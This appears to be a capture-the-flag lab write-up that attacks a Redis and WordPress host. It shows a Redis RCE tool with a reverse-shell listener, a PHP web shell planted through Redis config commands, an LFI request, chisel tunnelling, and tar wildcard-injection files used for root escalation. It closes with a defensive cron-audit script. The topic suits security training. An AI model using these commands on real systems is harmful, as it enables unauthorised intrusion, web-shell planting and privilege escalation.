# 6379

```
redis-cli -h 192.168.159.166
```

Then to authenticate:

```
AUTH Ready4Redis?
```

![](/files/JxLmKlwug9KU2sN7QjQF)

We are in.

## Failed

The version is 5.0.14:

![](/files/cwkYTegLF7h6YTcbFijK)

Using this: <https://github.com/Ridter/redis-rce>

We can get a shell:

```
python3 redis-rce.py -r 192.168.159.166 -L 192.168.45.223 -a 'Ready4Redis?' -f exp.so
```

![](/files/YTJ1LPF715AMcv2opoep)

Then set up a listener:

```
rlwrap nc -nlvp 80
```

![](/files/dciMcl7NUcrmrLekwGBy)

We get a shell.

Now we can look for the wp-config file and get the database password:

```
cat /var/www/html/wp-config.php
```

![](/files/Zqt9d40bY4M0p01x9JfD)

Checking netstat:

```
netstat -antup
```

![](/files/8fBCKdZiQHh6xg3hUoQn)

But we could not execute anything, so this was a waste.

**Cannot proceed, as we get a shell as the redis user**

## Success

We can check the service files for redis using the LFI:

```
curl 'http://192.168.231.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/systemd/system/redis.service' > redis.service
```

Now we can find the writeable directory:

![](/files/eNYiUmSRdDFpf39TlY51)

Then write a shell.php:

```
redis-cli -h 192.168.231.166
```

```
AUTH Ready4Redis?
config set dir /opt/redis-files
config set dbfilename shell.php
set test '<?php system($_GET["cmd"]); ?>'
save
```

Now we have command execution:

![](/files/qu3CkJn8OrUosujXLZrT)

We can get a shell now:

![](/files/zBtJfV7bsMfk1cISUr4d)

Now we can look for the wp-config file and get the database password:

```
cat /var/www/html/wp-config.php
```

![](/files/Zqt9d40bY4M0p01x9JfD)

Port forwarding:

Target:

```
$P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0
```

Kali:

```
chisel server --reverse --socks5 -p 8001
```

But we don't find anything in the database after logging in.

We find a cron job after running linpeas:

![](/files/HwKcZKh3JYaIFpL9GHzl)

![](/files/1S36RMkm2VQlqmR8RO3g)

The cron job runs tar with a `*` wildcard, which we can use to gain sudo access:

```
cd /var/www/html
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'
nano payload.sh
chmod +x payload.sh
```

Now in payload.sh:

![](/files/5OorN9CxoQr6Cusk0VQj)

Now we get a shell in the listener:

```
sudo rlwrap nc -nlvp 80
```

![](/files/JObGtJDeG1dO0OuX5rb9)
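
The cron finding works because the shell expands `*` before tar runs, so file names beginning with `-` arrive as tar options. As an added example (not part of the original walkthrough), this script flags crontab commands that pass a bare glob to tar and lists option-like file names in a directory; the crontab lines and the backup path are constructed sample data.

```sh
#!/bin/sh
# Added defensive example. All sample data below is constructed.

audit_cron_tar() {
    # $1: crontab-format file. Prints every entry where tar is handed a
    # relative glob (a token starting with "*") with no "--" before it.
    awk '
        NF == 0 || $1 ~ /^#/ { next }
        {
            seen_tar = 0; guarded = 0
            for (i = 6; i <= NF; i++) {          # skip the 5 schedule fields
                if ($i ~ /(^|\/)tar$/) { seen_tar = 1; guarded = 0; continue }
                if (seen_tar && $i == "--") guarded = 1
                if (seen_tar && !guarded && $i ~ /^\*/) { print; next }
            }
        }' "$1"
}

option_like_names() {
    # $1: directory. Prints entries whose names start with "-", which a
    # bare "*" would turn into command-line options.
    for f in "$1"/-*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# Constructed sample: one unsafe cron entry, one guarded with "--".
demo=$(mktemp -d)
cat > "$demo/crontab" <<'EOF'
# m h dom mon dow user command
*/3 * * * * root cd /var/www/html && tar -zcf /var/backups/site.tgz *
*/3 * * * * root cd /var/www/html && tar -zcf /var/backups/site.tgz -- *
EOF
mkdir "$demo/webroot"
: > "$demo/webroot/index.php"
: > "$demo/webroot/--checkpoint=1"

echo "Cron entries passing a bare glob to tar:"
audit_cron_tar "$demo/crontab"
echo "Option-like names in the archived directory:"
option_like_names "$demo/webroot"
rm -rf "$demo"
```

Rewriting the job as `tar ... -- *` or `tar ... ./*` makes tar treat every expanded name as a file rather than an option.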

